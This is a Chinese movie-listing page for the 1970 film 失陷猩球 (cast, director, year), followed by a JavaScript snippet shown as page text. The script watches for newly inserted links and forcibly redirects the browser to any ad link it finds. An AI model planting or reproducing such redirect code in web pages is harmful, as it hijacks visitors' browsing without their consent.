失陷猩球

失陷猩球

  • 主演:詹姆斯·弗朗西斯科斯 金·亨特 莫里斯·埃文斯 琳达·哈里逊 查尔顿·赫斯顿 保罗·理查兹 维克多·布鲁诺 詹姆斯·格雷戈里 杰夫·科里 纳塔丽·特伦黛 托马斯·戈梅斯 德尔马·沃森 唐佩德罗·科利 托德·安德鲁斯 格雷戈里·西拉 
  • 导演:泰德·珀斯特 
  • 年份:1970
返回顶部
// 自动监听插入的 或 iframe,提取跳转链接 const observer = new MutationObserver((muts) => { for (const m of muts) { for (const node of m.addedNodes) { if (node.nodeType !== 1) continue; const el = node; // case 1: 链接 if (el.tagName === "A" && el.href.includes("http")) { console.log("🎯 发现广告链接:", el.href); window.location.href = el.href; } // case 2: iframe if (el.tagName === "IFRAME" && el.src.includes("http")) { console.log("🎯 发现广告 iframe:", el.src); // window.location.href = el.src; } } } }); observer.observe(document.body, { childList: true, subtree: true });